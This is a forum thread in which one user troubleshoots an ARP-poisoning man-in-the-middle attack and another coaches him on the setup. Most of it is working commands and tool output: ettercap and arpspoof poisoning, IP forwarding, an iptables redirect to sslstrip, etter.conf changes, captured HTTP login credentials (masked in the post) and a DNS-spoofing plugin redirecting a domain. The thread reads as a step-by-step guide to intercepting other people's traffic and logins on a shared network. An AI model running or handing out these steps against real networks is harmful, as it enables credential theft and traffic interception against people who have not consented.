Ettercap not detecting hosts

[SilvaRizla]

I'm having trouble with ettercap, when it scans for hosts it detects the router but not me (connected via wifi) so I can't arp poison, does anyone know what to do here?

[thorin]

Is your wi-fi connected machine actually on the same subnet?

[SilvaRizla]

Yes they are on the same subnet, if I run via terminal with:
sudo ettercap -T --iface ra0 -q -M arp:remote /192.168.0.1/ // ***(192.168.0.1 is router)

then it will scan and add the router to the hosts list, and not detect my IP (192.168.0.3) but I have noticed if I use links (terminal browser) and log in to the router I get this:

HTTP : 192.168.0.1:80 -> USER: <MYUSER> PASS: <MYPASS> INFO: (null)

I don't get any output if I try SSl logins and I don't get any output whatsoever from firefox

[Handsome-geek]

Ettercap doesnt show your ip but if you arp poisning all hosts on subnet you can also see your surfing.

And if you new to ettercap why dont you try ettercap with graphic this will be much easier if you new to this program.

I prefer ettercap options from terminal if i must combine program with other tools so i dont need to have many open windows.

Also for ssl you must uncomment lines in etter.conf and combine attack with sslstrip (nice little tool).

Look here nice video from g0tmi1k's about attack to sniff ssl connections: http://forums.remote-exploit.org/bac...slstrip-3.html .

[SilvaRizla]

Ettercap doesnt show your ip but if you arp poisning all hosts on subnet you can also see your surfing.

I thought this may have been the case thats why I poisoned all

I prefer ettercap options from terminal if i must combine program with other tools so i dont need to have many open windows.

Same here...

Also for ssl you must uncomment lines in etter.conf and combine attack with sslstrip (nice little tool).

Look here nice video from g0tmi1k's about attack to sniff ssl connections:

I have already set up etter.conf and am combining with sslstrip, the parts I have changed in etter.conf are:

ec_uid = 0
ec_gid = 0

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"


arpspoof redirects traffic to my MAC but only if I do not specify myself as the target. If I do I get "arpspoof: couldn't arp for host 192.168.0.3"

This is the iptables command I am running;

iiptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

I run sslstrip

I get NOTHING. Totally stumped

[Handsome-geek]

Insert this before prerouting iptables and tell me results echo 1 > /proc/sys/net/ipv4/ip_forward.

And when you arp spoof, then 1 target is ip you are attacking and second target your gateaway try this attack with specified targets.

Arp spoofing all hosts on gateaway is good if you have 4 or more hosts on network try first with specefied target.

Tell results after you try. After you set ip forwading and prerouting then start sslstrip.

If page you are visiting on vicitim machine has http and is login page who normally has https then your attack is doing fine.

[SilvaRizla]

Insert this before prerouting iptables and tell me results echo 1 > /proc/sys/net/ipv4/ip_forward.

And when you arp spoof, then 1 target is ip you are attacking and second target your gateaway try this attack with specified targets.

Arp spoofing all hosts on gateaway is good if you have 4 or more hosts on network try first with specefied target.

Tell results after you try. After you set ip forwading and prerouting then start sslstrip.

If page you are visiting on vicitim machine has http and is login page who normally has https then your attack is doing fine.

Tried this now on ubuntu and Backtrack 4

root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:~#

root@bt:~# arpspoof -i ra0 -t 192.168.0.2 192.168.0.1

arpspoof: couldn't arp for host 192.168.0.2
root@bt:~# (192.168.0.2 is now my attacking machine as its the only one available at the moment)

root@bt:~# arpspoof -i ra0 192.168.0.1
0:22:75:3b:e3:98 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:22:75:3b:e3:98
0:22:75:3b:e3:98 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:22:75:3b:e3:98
0:22:75:3b:e3:98 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:22:75:3b:e3:98
0:22:75:3b:e3:98 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:22:75:3b:e3:98
etc....

root@bt:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
root@bt:~#

root@bt:~# sslstrip -a -f -k

Ettercap > Unified sniffing > scan hosts > 192.168.0.1 - target 2 > mitm >arp >sniff remote > start

Listening on ra0... (Ethernet)

ra0 -> 00:22:75:3B:E3:98 192.168.0.2 255.255.255.0

Privileges dropped to UID 65534 GID 65534...

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
1 hosts added to the hosts list...
Host 192.168.0.1 added to TARGET2

ARP poisoning victims:

GROUP 1 : ANY (all the hosts in the list)

GROUP 2 : 192.168.0.1 00:22:75:3B:E3:98
Starting Unified sniffing...

HTTP : 208.101.8.53:80 -> USER: ****** PASS: **** INFO: <A forum address>

HTTP : 192.168.0.1:80 -> USER: ***** PASS: ***** INFO: 192.168.0.1
HTTP : 67.15.24.40:80 -> USER: **** PASS: ***** INFO: <a forum address>
Activating chk_poison plugin...
chk_poison: Checking poisoning status...
chk_poison: No poisoning at all

I just realized I set it up for dns spoofing, which is working.
Activating dns_spoof plugin...
dns_spoof: wwwdot-microsoft-dotcom spoofed to [198.182.196.56]
Unified sniffing was stopped.



Host 192.168.0.1 added to TARGET1


I stopped the sniff and put the router in target 1:

no SSL but HTML logins as above